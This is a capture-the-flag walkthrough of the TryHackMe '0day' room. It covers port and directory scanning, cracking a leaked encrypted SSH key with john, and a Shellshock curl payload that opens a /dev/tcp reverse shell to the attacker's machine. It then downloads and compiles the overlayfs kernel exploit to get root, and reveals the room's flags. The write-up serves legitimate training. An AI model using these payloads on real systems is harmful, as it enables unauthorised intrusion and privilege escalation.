TryHackMe - 0day - Writeup

Exploit Ubuntu, like a Turtle in a Hurricane

Nmap Fuzzing

root@ip-10-10-103-250:~# nmap -sCV -p- -A 10.10.255.144 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-13 07:40 BST
Nmap scan report for ip-10-10-255-144.eu-west-1.compute.internal (10.10.255.144)
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0day
MAC Address: 02:97:C6:48:94:B9 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms ip-10-10-255-144.eu-west-1.compute.internal (10.10.255.144)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1217.32 seconds

Directory Fuzzing

root@ip-10-10-103-250:~# gobuster dir -u http://10.10.255.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.255.144
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     sh,txt,cgi,html,css,js,py,php
[+] Timeout:        10s
===============================================================
2021/06/13 08:06:44 Starting gobuster
===============================================================
/index.html (Status: 200)
/cgi-bin (Status: 301)
/img (Status: 301)
/uploads (Status: 301)
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/backup (Status: 301)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
===============================================================
2021/06/13 08:10:05 Finished
===============================================================
root@ip-10-10-103-250:~# 

Found SSH private key in http://10.10.255.144/backup directory

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----

http://10.10.255.144/robots.txt saying

You really thought it'd be this easy?

In the http://10.10.255.144/secret/ directory there is a Turtles image.

<html>
<head>
<title>Turtles?</title>
</head>
<body>
<center><img src="turtle.png"></center>
</body>
</html>

Let’s try to use the SSH private key to login via SSH, This SSH key is encrypted use ssh2john to crack the password.

root@ip-10-10-103-250:~# python3 ssh2john.py id_rsa > id_rsa.enc
root@ip-10-10-103-250:~# john id_rsa.enc --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (id_rsa)
1g 0:00:00:19 DONE (2021-06-13 08:20) 0.05128g/s 735471p/s 735471c/s 735471C/s *7¡Vamos!
Session completed. 

Password for the key is letmein but I didn’t got any username for it. I missed one thing is /cgi-bin directory. So, I run nikto to scan the host.

root@ip-10-10-103-250:~# nikto -h http://10.10.255.144
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.255.144
+ Target Hostname:    ip-10-10-255-144.eu-west-1.compute.internal
+ Target Port:        80
+ Start Time:         2021-06-13 08:43:39 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xbd1 0x5ae57bb9a1192 
+ The anti-clickjacking X-Frame-Options header is not present.
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/index.html: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2021-06-13 08:43:49 (GMT1) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Previously I exploited few of /cgi-bin/test.cgi in bug bounty program. Let’s try to use shellshock if we can execute arbitrary code using unix bash remotely.

root@ip-10-10-103-250:~# curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://10.10.255.144/cgi-bin/test.cgi

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Holy Moly It working we got id now get a reverse shell using arbitrary code execution.

root@ip-10-10-103-250:~# curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.103.250/1234 0>&1' http://10.10.255.144/cgi-bin/test.cgi

Got shell in our 1234 listening port and get the user.txt from /home/ryan/user.txt

root@ip-10-10-103-250:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.255.144 36295 received!
bash: cannot set terminal process group (837): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$ whoami
whoami
www-data
www-data@ubuntu:/home/ryan$ cat user.txt
cat user.txt
THM{Sh3llSh0ck_r0ckz}

It’s time for escalate privilege. Normally I start checking from sudo -l then cat /etc/crontab I found none of them are will work here checked few directroy such as /opt , /var nothing in there in the short description of machine said that Exploit Ubuntu, like a Turtle in a Hurricane Interesting? lets check kernel version of the target machine using cat /etc/*-release and uname -a

root@ip-10-10-103-250:/opt/searchsploit/exploits/linux/local# searchsploit Ubuntu 14.04 3.13
[i] Found (#2): /opt/searchsploit/files_exploits.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#2): /opt/searchsploit/files_shellcodes.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlay | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlay | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary  | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free   | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Esc | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Priv | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Priv | linux/local/41760.txt
----------------------------------------------------------------------- ---------------------------------

For this kernel version I found a exploit name Overlayfs Priv Esc you can get the exploit in /opt/searchsploit/exploits/linux/local/37292.c

So, I checked in the target machine if gcc and wget are in there. Now go to /tmp directory and wget the exploit from your host machine.

www-data@ubuntu:/home/ryan$ which gcc
which gcc
/usr/bin/gcc
www-data@ubuntu:/home/ryan$ cd /tmp 
cd /tmp
www-data@ubuntu:/tmp$ which wget
which wget
/usr/bin/wget
www-data@ubuntu:/tmp$ wget http://10.10.103.250:1337/37292.c
wget http://10.10.103.250:1337/37292.c
--2021-06-13 01:18:12--  http://10.10.103.250:1337/37292.c
Connecting to 10.10.103.250:1337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'

     0K ....                                                  100%  102M=0s

2021-06-13 01:18:12 (102 MB/s) - '37292.c' saved [5119/5119]

Tried to compile in target machine but failed

www-data@ubuntu:/tmp$ gcc 37292.c -o rootExploit      
gcc 37292.c -o rootExploit
gcc: error trying to exec 'cc1': execvp: No such file or directory

After few minute of doing Stackoverflow I found that this issue happening because of $PATH the way target machine PATH set was not good, I changed the path to

www-data@ubuntu:/tmp$ echo $PATH
echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
www-data@ubuntu:/tmp$ export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
bin:/bin:/sbinsr/local/bin:/usr/local/sbin:/usr/bin:/usr/s 

After compile and run the exploit we got root and the root flag as well as.

www-data@ubuntu:/tmp$ gcc 37292.c -o root_exploit && ./root_exploit
gcc 37292.c -o root_exploit && ./root_exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
THM{g00d_j0b_0day_is_Pleased}

Thanks for reading

Room link: 0day

Written on June 13, 2021